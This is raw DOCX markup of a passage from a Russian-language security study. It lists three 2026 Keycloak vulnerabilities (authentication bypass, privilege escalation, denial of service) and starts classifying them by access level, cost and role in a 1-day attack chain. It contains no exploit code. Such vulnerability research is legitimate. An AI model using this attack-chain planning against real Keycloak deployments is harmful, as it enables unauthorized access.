      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DFE0B" w14:textId="12642CD9" w:rsidR="00BA53F1" w:rsidRPr="00C54DEE" w:rsidRDefault="00BA53F1" w:rsidP="00BA53F1">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>На основании выявленных в ходе идентификации версий компонентов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>был проведён поиск уязвимостей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A748B0">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">(NIST NVD, </w:t>
      </w:r>
      <w:r>
        <w:t>ФСТЭК БДУ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748B0">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, применимых к используемым версиям ПО. Отбирались уязвимости, затрагивающие компоненты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступные в исследуемом стенде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты сведены в </w:t>
      </w:r>
      <w:r w:rsidR="000F2390">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234284399 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F2390">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблице</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000F2390">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA6E2E" w14:textId="51039937" w:rsidR="00355459" w:rsidRPr="00C27C90" w:rsidRDefault="00C27C90" w:rsidP="00C27C90">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Ref234284399"/>
      <w:r w:rsidRPr="00C27C90">
        <w:t>Используемые уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac"/>
        <w:tblW w:w="9348" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="1179"/>
        <w:gridCol w:w="1373"/>
        <w:gridCol w:w="870"/>
        <w:gridCol w:w="1373"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="748"/>
        <w:gridCol w:w="1996"/>
      </w:tblGrid>
      <w:tr w:rsidR="00355459" w:rsidRPr="00984FD9" w14:paraId="2BD7FDD9" w14:textId="77777777" w:rsidTr="00557FDB">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1688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1C17A" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>№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83C2A" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br w:type="page"/>
              <w:t>CVE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8DEBE" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Тип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5DD70" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVSSv3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CF74A" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Компонент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7B76A" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Уязвимые версии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415B5" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Наличие эксплойта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17D12" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00974B62" w:rsidRDefault="00355459" w:rsidP="003A594A">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974B62">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Комментарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00424600" w:rsidRPr="00984FD9" w14:paraId="5132FEC2" w14:textId="77777777" w:rsidTr="00497FAD">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="116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22D4D" w14:textId="6CA4C802" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00424600" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>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90AE" w14:textId="629E2DC4" w:rsidR="00424600" w:rsidRPr="00424600" w:rsidRDefault="00C27C90" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00E53E47" w:rsidRPr="00E53E47">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00E53E47" w:rsidRPr="00E53E47">
              <w:t>2026-7504</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»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B3569" w14:textId="3D6007A9" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Обход аутентификации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CBA96" w14:textId="1AD88B06" w:rsidR="00424600" w:rsidRPr="00424600" w:rsidRDefault="00002CDB" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>8.1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E43B" w14:textId="2467E9E5" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00763E44" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB"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A02D" w14:textId="596B53EE" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">До </w:t>
            </w:r>
            <w:r w:rsidRPr="00E53E47">
              <w:t>26.6.2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91AC" w14:textId="11186CB8" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Нет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5D96" w14:textId="245BB9CC" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Обход валидации URI перенаправления</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00424600" w:rsidRPr="00984FD9" w14:paraId="1A95315F" w14:textId="77777777" w:rsidTr="00497FAD">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1545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25F6" w14:textId="0899DFA7" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00424600" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>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0BC1" w14:textId="1525A390" w:rsidR="00424600" w:rsidRPr="00424600" w:rsidRDefault="00C27C90" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00E53E47" w:rsidRPr="00E53E47">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00E53E47" w:rsidRPr="00E53E47">
              <w:t>2026-9704</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»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B405" w14:textId="3765982F" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Повышение привилегий</w:t>
            </w:r>
            <w:r w:rsidR="000F7006" w:rsidRPr="000F7006">
              <w:t xml:space="preserve"> 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F389" w14:textId="535DE3EA" w:rsidR="00424600" w:rsidRPr="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>6.8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D92A" w14:textId="1A598C31" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00763E44" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB"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E69E" w14:textId="0436A3DD" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">До </w:t>
            </w:r>
            <w:r w:rsidRPr="00E53E47">
              <w:t>26.6.3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20460" w14:textId="1D1D9AF7" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Нет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D3EF" w14:textId="0BA732E2" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t xml:space="preserve">Скрытое удаление </w:t>
            </w:r>
            <w:r w:rsidR="00C27C90">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E53E47">
              <w:t>subject_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C27C90">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00E53E47">
              <w:t xml:space="preserve"> при обмене токенами</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00424600" w:rsidRPr="00984FD9" w14:paraId="5A2018FC" w14:textId="77777777" w:rsidTr="00497FAD">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1545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885F" w14:textId="1225C4F0" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00424600" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>3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65FF" w14:textId="17687A50" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00C27C90" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:t>2026-9803</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»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DE66" w14:textId="7354E287" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Отказ в обслуживании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C512" w14:textId="2C8A90F8" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00002CDB" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>5.3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43176" w14:textId="2CB4D491" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00763E44" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB"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4154" w14:textId="728A8BB4" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">До </w:t>
            </w:r>
            <w:r w:rsidRPr="00E53E47">
              <w:t>26.6.3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F59B" w14:textId="03DADC1A" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Нет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F6B9" w14:textId="1361633E" w:rsidR="00424600" w:rsidRPr="00984FD9" w:rsidRDefault="00E53E47" w:rsidP="00424600">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Некорректный заголовок «</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E53E47">
              <w:t>Authorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E53E47">
              <w:t>» роняет обработку</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A5E737B" w14:textId="77777777" w:rsidR="00355459" w:rsidRPr="00A1333F" w:rsidRDefault="00355459" w:rsidP="00355459">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00355459" w:rsidRPr="00A1333F" w:rsidSect="00497FAD">
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567" w:footer="340" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B48A13F" w14:textId="158B7FCD" w:rsidR="00F72134" w:rsidRDefault="00E9121A" w:rsidP="00F72134">
      <w:pPr>
        <w:pStyle w:val="130"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc177388687"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Попытки составления цепочек </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9121A">
        <w:t>1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>day</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C6A5D" w14:textId="5D40DCDF" w:rsidR="00BA53F1" w:rsidRPr="00BA53F1" w:rsidRDefault="00BA53F1" w:rsidP="00BA53F1">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">ыявленные уязвимости были классифицированы по требуемому уровню доступа (до/после аутентификации), стоимости эксплуатации и потенциальной роли в цепочке атаки </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234284564 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблица</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. На</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA53F1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> основе этой классификации были сформированы возможные цепочки, рассмотренные далее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C62F6" w14:textId="1148FC3D" w:rsidR="00E3760B" w:rsidRDefault="00E3760B" w:rsidP="00C27C90">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Ref234284564"/>
      <w:r w:rsidRPr="00E0795C">
        <w:t>Классификация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0795C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac"/>
        <w:tblW w:w="9356" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="572"/>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="2384"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00414482" w:rsidRPr="00E3760B" w14:paraId="2DEDB721" w14:textId="77777777" w:rsidTr="00C27C90">
        <w:trPr>
          <w:trHeight w:val="828"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D217ED2" w14:textId="1986602E" w:rsidR="00414482" w:rsidRPr="00C82B97" w:rsidRDefault="00C27C90" w:rsidP="00E3760B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№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="495EBB0C" w14:textId="4C8A9FCE" w:rsidR="00414482" w:rsidRPr="00C82B97" w:rsidRDefault="00414482" w:rsidP="00E3760B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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523A98B8" w14:textId="29D452EE" w:rsidR="00414482" w:rsidRPr="00C82B97" w:rsidRDefault="00414482" w:rsidP="00E3760B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До/после аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D01B11F" w14:textId="56C67BAE" w:rsidR="00414482" w:rsidRPr="00C82B97" w:rsidRDefault="00414482" w:rsidP="00E3760B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>Стоимость эксплуатации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34F4C9C7" w14:textId="372725A6" w:rsidR="00414482" w:rsidRPr="00C82B97" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Роль в цепочке</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414482" w:rsidRPr="00E3760B" w14:paraId="10B01E71" w14:textId="77777777" w:rsidTr="00C27C90">
        <w:trPr>
          <w:trHeight w:val="828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0DC01E" w14:textId="6373112B" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430DF6B7" w14:textId="1771E282" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00414482" w:rsidRPr="00E3760B">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00414482" w:rsidRPr="00E3760B">
              <w:t>2026-7504</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09BEA346" w14:textId="2C0B0356" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>До</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718A7145" w14:textId="4DBCCA39" w:rsidR="00414482" w:rsidRPr="00BA53F1" w:rsidRDefault="00BA53F1" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
